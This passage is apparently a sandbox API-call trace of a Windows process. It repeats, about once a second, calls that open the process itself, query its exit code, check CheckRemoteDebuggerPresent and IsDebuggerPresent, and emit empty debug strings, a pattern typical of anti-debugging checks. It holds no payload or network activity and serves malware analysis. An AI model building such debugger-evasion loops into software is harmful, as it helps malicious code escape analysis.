() returned 0 [0095.865] GetCurrentProcessId () returned 0xf64 [0095.865] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x368 [0095.865] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x28ff174 | out: lpExitCode=0x28ff174*=0x103) returned 1 [0095.865] CloseHandle (hObject=0x368) returned 1 [0095.865] OutputDebugStringW (lpOutputString="") [0096.878] GetCurrentProcessId () returned 0xf64 [0096.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x36c [0096.879] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x28ff39c | out: lpExitCode=0x28ff39c*=0x103) returned 1 [0096.879] CheckRemoteDebuggerPresent (in: hProcess=0x36c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0096.879] IsDebuggerPresent () returned 0 [0096.879] GetCurrentProcessId () returned 0xf64 [0096.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x370 [0096.880] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x28ff454 | out: lpExitCode=0x28ff454*=0x103) returned 1 [0096.880] CloseHandle (hObject=0x370) returned 1 [0096.880] OutputDebugStringW (lpOutputString="") [0097.890] GetCurrentProcessId () returned 0xf64 [0097.891] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x374 [0097.891] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x28ff67c | out: lpExitCode=0x28ff67c*=0x103) returned 1 [0097.891] CheckRemoteDebuggerPresent (in: hProcess=0x374, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0097.891] IsDebuggerPresent () returned 0 [0097.891] GetCurrentProcessId () returned 0xf64 [0097.891] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x378 [0097.891] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x28ff734 | out: lpExitCode=0x28ff734*=0x103) returned 1 [0097.891] CloseHandle (hObject=0x378) returned 1 [0097.892] OutputDebugStringW (lpOutputString="") [0098.905] GetCurrentProcessId () returned 0xf64 [0098.905] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x37c [0098.905] GetExitCodeProcess (in: hProcess=0x37c, lpExitCode=0x28ff95c | out: lpExitCode=0x28ff95c*=0x103) returned 1 [0098.905] CheckRemoteDebuggerPresent (in: hProcess=0x37c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0098.905] IsDebuggerPresent () returned 0 [0098.905] GetCurrentProcessId () returned 0xf64 [0098.906] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x380 [0098.906] GetExitCodeProcess (in: hProcess=0x380, lpExitCode=0x28ffa14 | out: lpExitCode=0x28ffa14*=0x103) returned 1 [0098.906] CloseHandle (hObject=0x380) returned 1 [0098.906] OutputDebugStringW (lpOutputString="") [0099.934] GetCurrentProcessId () returned 0xf64 [0099.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x38c [0099.935] GetExitCodeProcess (in: hProcess=0x38c, lpExitCode=0x28ffc3c | out: lpExitCode=0x28ffc3c*=0x103) returned 1 [0099.935] CheckRemoteDebuggerPresent (in: hProcess=0x38c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0099.935] IsDebuggerPresent () returned 0 [0099.935] GetCurrentProcessId () returned 0xf64 [0099.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x390 [0099.935] GetExitCodeProcess (in: hProcess=0x390, lpExitCode=0x28ffcf4 | out: lpExitCode=0x28ffcf4*=0x103) returned 1 [0099.936] CloseHandle (hObject=0x390) returned 1 [0099.936] OutputDebugStringW (lpOutputString="") [0100.948] GetCurrentProcessId () returned 0xf64 [0100.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x394 [0100.949] GetExitCodeProcess (in: hProcess=0x394, lpExitCode=0x28fff1c | out: lpExitCode=0x28fff1c*=0x103) returned 1 [0100.949] CheckRemoteDebuggerPresent (in: hProcess=0x394, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0100.949] IsDebuggerPresent () returned 0 [0100.950] GetCurrentProcessId () returned 0xf64 [0100.950] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x398 [0100.950] GetExitCodeProcess (in: hProcess=0x398, lpExitCode=0x28fffd4 | out: lpExitCode=0x28fffd4*=0x103) returned 1 [0100.950] CloseHandle (hObject=0x398) returned 1 [0100.951] OutputDebugStringW (lpOutputString="") [0101.970] GetCurrentProcessId () returned 0xf64 [0101.970] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x39c [0101.970] GetExitCodeProcess (in: hProcess=0x39c, lpExitCode=0x29001fc | out: lpExitCode=0x29001fc*=0x103) returned 1 [0101.971] CheckRemoteDebuggerPresent (in: hProcess=0x39c, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0101.971] IsDebuggerPresent () returned 0 [0101.971] GetCurrentProcessId () returned 0xf64 [0101.972] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a0 [0101.972] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x29002b4 | out: lpExitCode=0x29002b4*=0x103) returned 1 [0101.972] CloseHandle (hObject=0x3a0) returned 1 [0101.972] OutputDebugStringW (lpOutputString="") [0103.070] GetCurrentProcessId () returned 0xf64 [0103.070] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a4 [0103.070] GetExitCodeProcess (in: hProcess=0x3a4, lpExitCode=0x29004dc | out: lpExitCode=0x29004dc*=0x103) returned 1 [0103.070] CheckRemoteDebuggerPresent (in: hProcess=0x3a4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0103.070] IsDebuggerPresent () returned 0 [0103.070] GetCurrentProcessId () returned 0xf64 [0103.070] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3a8 [0103.071] GetExitCodeProcess (in: hProcess=0x3a8, lpExitCode=0x2900594 | out: lpExitCode=0x2900594*=0x103) returned 1 [0103.071] CloseHandle (hObject=0x3a8) returned 1 [0103.071] OutputDebugStringW (lpOutputString="") [0104.100] GetCurrentProcessId () returned 0xf64 [0104.101] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ac [0104.101] GetExitCodeProcess (in: hProcess=0x3ac, lpExitCode=0x29007c8 | out: lpExitCode=0x29007c8*=0x103) returned 1 [0104.101] CheckRemoteDebuggerPresent (in: hProcess=0x3ac, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0104.101] IsDebuggerPresent () returned 0 [0104.101] GetCurrentProcessId () returned 0xf64 [0104.101] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b0 [0104.102] GetExitCodeProcess (in: hProcess=0x3b0, lpExitCode=0x2900880 | out: lpExitCode=0x2900880*=0x103) returned 1 [0104.102] CloseHandle (hObject=0x3b0) returned 1 [0104.102] OutputDebugStringW (lpOutputString="") [0105.269] GetCurrentProcessId () returned 0xf64 [0105.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b4 [0105.270] GetExitCodeProcess (in: hProcess=0x3b4, lpExitCode=0x2900aa8 | out: lpExitCode=0x2900aa8*=0x103) returned 1 [0105.270] CheckRemoteDebuggerPresent (in: hProcess=0x3b4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0105.270] IsDebuggerPresent () returned 0 [0105.270] GetCurrentProcessId () returned 0xf64 [0105.270] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3b8 [0105.270] GetExitCodeProcess (in: hProcess=0x3b8, lpExitCode=0x2900b60 | out: lpExitCode=0x2900b60*=0x103) returned 1 [0105.270] CloseHandle (hObject=0x3b8) returned 1 [0105.271] OutputDebugStringW (lpOutputString="") [0106.283] GetCurrentProcessId () returned 0xf64 [0106.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3bc [0106.284] GetExitCodeProcess (in: hProcess=0x3bc, lpExitCode=0x2900d88 | out: lpExitCode=0x2900d88*=0x103) returned 1 [0106.284] CheckRemoteDebuggerPresent (in: hProcess=0x3bc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0106.284] IsDebuggerPresent () returned 0 [0106.284] GetCurrentProcessId () returned 0xf64 [0106.284] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c0 [0106.284] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x2900e40 | out: lpExitCode=0x2900e40*=0x103) returned 1 [0106.285] CloseHandle (hObject=0x3c0) returned 1 [0106.285] OutputDebugStringW (lpOutputString="") [0107.304] GetCurrentProcessId () returned 0xf64 [0107.304] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c4 [0107.304] GetExitCodeProcess (in: hProcess=0x3c4, lpExitCode=0x2901068 | out: lpExitCode=0x2901068*=0x103) returned 1 [0107.304] CheckRemoteDebuggerPresent (in: hProcess=0x3c4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0107.305] IsDebuggerPresent () returned 0 [0107.305] GetCurrentProcessId () returned 0xf64 [0107.305] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3c8 [0107.305] GetExitCodeProcess (in: hProcess=0x3c8, lpExitCode=0x2901120 | out: lpExitCode=0x2901120*=0x103) returned 1 [0107.305] CloseHandle (hObject=0x3c8) returned 1 [0107.305] OutputDebugStringW (lpOutputString="") [0108.311] GetCurrentProcessId () returned 0xf64 [0108.311] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3cc [0108.312] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x2901348 | out: lpExitCode=0x2901348*=0x103) returned 1 [0108.312] CheckRemoteDebuggerPresent (in: hProcess=0x3cc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0108.312] IsDebuggerPresent () returned 0 [0108.312] GetCurrentProcessId () returned 0xf64 [0108.312] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d0 [0108.312] GetExitCodeProcess (in: hProcess=0x3d0, lpExitCode=0x2901400 | out: lpExitCode=0x2901400*=0x103) returned 1 [0108.312] CloseHandle (hObject=0x3d0) returned 1 [0108.312] OutputDebugStringW (lpOutputString="") [0109.325] GetCurrentProcessId () returned 0xf64 [0109.326] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d4 [0109.326] GetExitCodeProcess (in: hProcess=0x3d4, lpExitCode=0x2901628 | out: lpExitCode=0x2901628*=0x103) returned 1 [0109.326] CheckRemoteDebuggerPresent (in: hProcess=0x3d4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0109.326] IsDebuggerPresent () returned 0 [0109.326] GetCurrentProcessId () returned 0xf64 [0109.326] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3d8 [0109.326] GetExitCodeProcess (in: hProcess=0x3d8, lpExitCode=0x29016e0 | out: lpExitCode=0x29016e0*=0x103) returned 1 [0109.326] CloseHandle (hObject=0x3d8) returned 1 [0109.326] OutputDebugStringW (lpOutputString="") [0110.343] GetCurrentProcessId () returned 0xf64 [0110.343] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3dc [0110.343] GetExitCodeProcess (in: hProcess=0x3dc, lpExitCode=0x2901908 | out: lpExitCode=0x2901908*=0x103) returned 1 [0110.343] CheckRemoteDebuggerPresent (in: hProcess=0x3dc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0110.343] IsDebuggerPresent () returned 0 [0110.344] GetCurrentProcessId () returned 0xf64 [0110.344] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e0 [0110.344] GetExitCodeProcess (in: hProcess=0x3e0, lpExitCode=0x29019c0 | out: lpExitCode=0x29019c0*=0x103) returned 1 [0110.344] CloseHandle (hObject=0x3e0) returned 1 [0110.344] OutputDebugStringW (lpOutputString="") [0111.777] GetCurrentProcessId () returned 0xf64 [0111.777] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e4 [0111.777] GetExitCodeProcess (in: hProcess=0x3e4, lpExitCode=0x2901be8 | out: lpExitCode=0x2901be8*=0x103) returned 1 [0111.777] CheckRemoteDebuggerPresent (in: hProcess=0x3e4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0111.777] IsDebuggerPresent () returned 0 [0111.778] GetCurrentProcessId () returned 0xf64 [0111.778] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3e8 [0111.778] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x2901ca0 | out: lpExitCode=0x2901ca0*=0x103) returned 1 [0111.778] CloseHandle (hObject=0x3e8) returned 1 [0111.779] OutputDebugStringW (lpOutputString="") [0112.789] GetCurrentProcessId () returned 0xf64 [0112.790] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3ec [0112.790] GetExitCodeProcess (in: hProcess=0x3ec, lpExitCode=0x2901ec8 | out: lpExitCode=0x2901ec8*=0x103) returned 1 [0112.790] CheckRemoteDebuggerPresent (in: hProcess=0x3ec, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0112.790] IsDebuggerPresent () returned 0 [0112.790] GetCurrentProcessId () returned 0xf64 [0112.790] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f0 [0112.790] GetExitCodeProcess (in: hProcess=0x3f0, lpExitCode=0x2901f80 | out: lpExitCode=0x2901f80*=0x103) returned 1 [0112.790] CloseHandle (hObject=0x3f0) returned 1 [0112.791] OutputDebugStringW (lpOutputString="") [0113.803] GetCurrentProcessId () returned 0xf64 [0113.803] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f4 [0113.803] GetExitCodeProcess (in: hProcess=0x3f4, lpExitCode=0x29021b4 | out: lpExitCode=0x29021b4*=0x103) returned 1 [0113.803] CheckRemoteDebuggerPresent (in: hProcess=0x3f4, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0113.803] IsDebuggerPresent () returned 0 [0113.803] GetCurrentProcessId () returned 0xf64 [0113.804] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3f8 [0113.804] GetExitCodeProcess (in: hProcess=0x3f8, lpExitCode=0x290226c | out: lpExitCode=0x290226c*=0x103) returned 1 [0113.804] CloseHandle (hObject=0x3f8) returned 1 [0113.804] OutputDebugStringW (lpOutputString="") [0114.829] GetCurrentProcessId () returned 0xf64 [0114.829] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x3fc [0114.829] GetExitCodeProcess (in: hProcess=0x3fc, lpExitCode=0x2902494 | out: lpExitCode=0x2902494*=0x103) returned 1 [0114.829] CheckRemoteDebuggerPresent (in: hProcess=0x3fc, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0114.829] IsDebuggerPresent () returned 0 [0114.829] GetCurrentProcessId () returned 0xf64 [0114.829] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x404 [0114.830] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x290254c | out: lpExitCode=0x290254c*=0x103) returned 1 [0114.830] CloseHandle (hObject=0x404) returned 1 [0114.830] OutputDebugStringW (lpOutputString="") [0115.878] GetCurrentProcessId () returned 0xf64 [0115.878] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x408 [0115.879] GetExitCodeProcess (in: hProcess=0x408, lpExitCode=0x2902774 | out: lpExitCode=0x2902774*=0x103) returned 1 [0115.879] CheckRemoteDebuggerPresent (in: hProcess=0x408, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0115.879] IsDebuggerPresent () returned 0 [0115.879] GetCurrentProcessId () returned 0xf64 [0115.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x40c [0115.880] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x290282c | out: lpExitCode=0x290282c*=0x103) returned 1 [0115.880] CloseHandle (hObject=0x40c) returned 1 [0115.880] OutputDebugStringW (lpOutputString="") [0117.297] GetCurrentProcessId () returned 0xf64 [0117.298] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x410 [0117.298] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x2902a54 | out: lpExitCode=0x2902a54*=0x103) returned 1 [0117.298] CheckRemoteDebuggerPresent (in: hProcess=0x410, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0117.298] IsDebuggerPresent () returned 0 [0117.298] GetCurrentProcessId () returned 0xf64 [0117.298] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x414 [0117.298] GetExitCodeProcess (in: hProcess=0x414, lpExitCode=0x2902b0c | out: lpExitCode=0x2902b0c*=0x103) returned 1 [0117.299] CloseHandle (hObject=0x414) returned 1 [0117.299] OutputDebugStringW (lpOutputString="") [0118.311] GetCurrentProcessId () returned 0xf64 [0118.311] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x418 [0118.311] GetExitCodeProcess (in: hProcess=0x418, lpExitCode=0x2902d34 | out: lpExitCode=0x2902d34*=0x103) returned 1 [0118.312] CheckRemoteDebuggerPresent (in: hProcess=0x418, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0118.312] IsDebuggerPresent () returned 0 [0118.312] GetCurrentProcessId () returned 0xf64 [0118.312] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x41c [0118.312] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x2902dec | out: lpExitCode=0x2902dec*=0x103) returned 1 [0118.312] CloseHandle (hObject=0x41c) returned 1 [0118.312] OutputDebugStringW (lpOutputString="") [0119.325] GetCurrentProcessId () returned 0xf64 [0119.325] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x420 [0119.325] GetExitCodeProcess (in: hProcess=0x420, lpExitCode=0x2903014 | out: lpExitCode=0x2903014*=0x103) returned 1 [0119.325] CheckRemoteDebuggerPresent (in: hProcess=0x420, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0119.325] IsDebuggerPresent () returned 0 [0119.326] GetCurrentProcessId () returned 0xf64 [0119.326] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x424 [0119.326] GetExitCodeProcess (in: hProcess=0x424, lpExitCode=0x29030cc | out: lpExitCode=0x29030cc*=0x103) returned 1 [0119.326] CloseHandle (hObject=0x424) returned 1 [0119.326] OutputDebugStringW (lpOutputString="") [0120.340] GetCurrentProcessId () returned 0xf64 [0120.340] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x428 [0120.340] GetExitCodeProcess (in: hProcess=0x428, lpExitCode=0x29032f4 | out: lpExitCode=0x29032f4*=0x103) returned 1 [0120.341] CheckRemoteDebuggerPresent (in: hProcess=0x428, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0120.341] IsDebuggerPresent () returned 0 [0120.341] GetCurrentProcessId () returned 0xf64 [0120.341] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x42c [0120.341] GetExitCodeProcess (in: hProcess=0x42c, lpExitCode=0x29033ac | out: lpExitCode=0x29033ac*=0x103) returned 1 [0120.341] CloseHandle (hObject=0x42c) returned 1 [0120.341] OutputDebugStringW (lpOutputString="") [0121.353] GetCurrentProcessId () returned 0xf64 [0121.353] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x430 [0121.354] GetExitCodeProcess (in: hProcess=0x430, lpExitCode=0x29035d4 | out: lpExitCode=0x29035d4*=0x103) returned 1 [0121.354] CheckRemoteDebuggerPresent (in: hProcess=0x430, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0121.354] IsDebuggerPresent () returned 0 [0121.354] GetCurrentProcessId () returned 0xf64 [0121.355] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x434 [0121.355] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x290368c | out: lpExitCode=0x290368c*=0x103) returned 1 [0121.355] CloseHandle (hObject=0x434) returned 1 [0121.355] OutputDebugStringW (lpOutputString="") [0122.367] GetCurrentProcessId () returned 0xf64 [0122.367] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x438 [0122.368] GetExitCodeProcess (in: hProcess=0x438, lpExitCode=0x29038b4 | out: lpExitCode=0x29038b4*=0x103) returned 1 [0122.368] CheckRemoteDebuggerPresent (in: hProcess=0x438, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0122.368] IsDebuggerPresent () returned 0 [0122.368] GetCurrentProcessId () returned 0xf64 [0122.368] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x43c [0122.368] GetExitCodeProcess (in: hProcess=0x43c, lpExitCode=0x290396c | out: lpExitCode=0x290396c*=0x103) returned 1 [0122.368] CloseHandle (hObject=0x43c) returned 1 [0122.369] OutputDebugStringW (lpOutputString="") [0123.394] GetCurrentProcessId () returned 0xf64 [0123.394] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x440 [0123.394] GetExitCodeProcess (in: hProcess=0x440, lpExitCode=0x2903b94 | out: lpExitCode=0x2903b94*=0x103) returned 1 [0123.394] CheckRemoteDebuggerPresent (in: hProcess=0x440, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0123.394] IsDebuggerPresent () returned 0 [0123.395] GetCurrentProcessId () returned 0xf64 [0123.395] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x444 [0123.395] GetExitCodeProcess (in: hProcess=0x444, lpExitCode=0x2903c4c | out: lpExitCode=0x2903c4c*=0x103) returned 1 [0123.396] CloseHandle (hObject=0x444) returned 1 [0123.396] OutputDebugStringW (lpOutputString="") [0124.411] GetCurrentProcessId () returned 0xf64 [0124.411] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x448 [0124.411] GetExitCodeProcess (in: hProcess=0x448, lpExitCode=0x2903e74 | out: lpExitCode=0x2903e74*=0x103) returned 1 [0124.411] CheckRemoteDebuggerPresent (in: hProcess=0x448, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0124.411] IsDebuggerPresent () returned 0 [0124.412] GetCurrentProcessId () returned 0xf64 [0124.412] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x44c [0124.412] GetExitCodeProcess (in: hProcess=0x44c, lpExitCode=0x2903f2c | out: lpExitCode=0x2903f2c*=0x103) returned 1 [0124.412] CloseHandle (hObject=0x44c) returned 1 [0124.412] OutputDebugStringW (lpOutputString="") [0125.425] GetCurrentProcessId () returned 0xf64 [0125.425] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x450 [0125.425] GetExitCodeProcess (in: hProcess=0x450, lpExitCode=0x2904160 | out: lpExitCode=0x2904160*=0x103) returned 1 [0125.425] CheckRemoteDebuggerPresent (in: hProcess=0x450, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0125.425] IsDebuggerPresent () returned 0 [0125.426] GetCurrentProcessId () returned 0xf64 [0125.426] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x454 [0125.426] GetExitCodeProcess (in: hProcess=0x454, lpExitCode=0x2904218 | out: lpExitCode=0x2904218*=0x103) returned 1 [0125.426] CloseHandle (hObject=0x454) returned 1 [0125.426] OutputDebugStringW (lpOutputString="") [0126.579] GetCurrentProcessId () returned 0xf64 [0126.579] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x458 [0126.579] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x2904440 | out: lpExitCode=0x2904440*=0x103) returned 1 [0126.580] CheckRemoteDebuggerPresent (in: hProcess=0x458, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0126.580] IsDebuggerPresent () returned 0 [0126.580] GetCurrentProcessId () returned 0xf64 [0126.580] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x45c [0126.580] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x29044f8 | out: lpExitCode=0x29044f8*=0x103) returned 1 [0126.580] CloseHandle (hObject=0x45c) returned 1 [0126.581] OutputDebugStringW (lpOutputString="") [0127.609] GetCurrentProcessId () returned 0xf64 [0127.609] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x460 [0127.609] GetExitCodeProcess (in: hProcess=0x460, lpExitCode=0x2904720 | out: lpExitCode=0x2904720*=0x103) returned 1 [0127.609] CheckRemoteDebuggerPresent (in: hProcess=0x460, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0127.609] IsDebuggerPresent () returned 0 [0127.610] GetCurrentProcessId () returned 0xf64 [0127.610] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x464 [0127.610] GetExitCodeProcess (in: hProcess=0x464, lpExitCode=0x29047d8 | out: lpExitCode=0x29047d8*=0x103) returned 1 [0127.610] CloseHandle (hObject=0x464) returned 1 [0127.610] OutputDebugStringW (lpOutputString="") [0128.622] GetCurrentProcessId () returned 0xf64 [0128.623] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x468 [0128.623] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x2904a00 | out: lpExitCode=0x2904a00*=0x103) returned 1 [0128.623] CheckRemoteDebuggerPresent (in: hProcess=0x468, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0128.623] IsDebuggerPresent () returned 0 [0128.623] GetCurrentProcessId () returned 0xf64 [0128.623] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x46c [0128.623] GetExitCodeProcess (in: hProcess=0x46c, lpExitCode=0x2904ab8 | out: lpExitCode=0x2904ab8*=0x103) returned 1 [0128.624] CloseHandle (hObject=0x46c) returned 1 [0128.624] OutputDebugStringW (lpOutputString="") [0129.652] GetCurrentProcessId () returned 0xf64 [0129.652] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x470 [0129.653] GetExitCodeProcess (in: hProcess=0x470, lpExitCode=0x2904ce0 | out: lpExitCode=0x2904ce0*=0x103) returned 1 [0129.653] CheckRemoteDebuggerPresent (in: hProcess=0x470, pbDebuggerPresent=0x4f5f5c8 | out: pbDebuggerPresent=0x4f5f5c8) returned 1 [0129.653] IsDebuggerPresent () returned 0 [0129.653] GetCurrentProcessId () returned 0xf64 [0129.653] OpenProcess 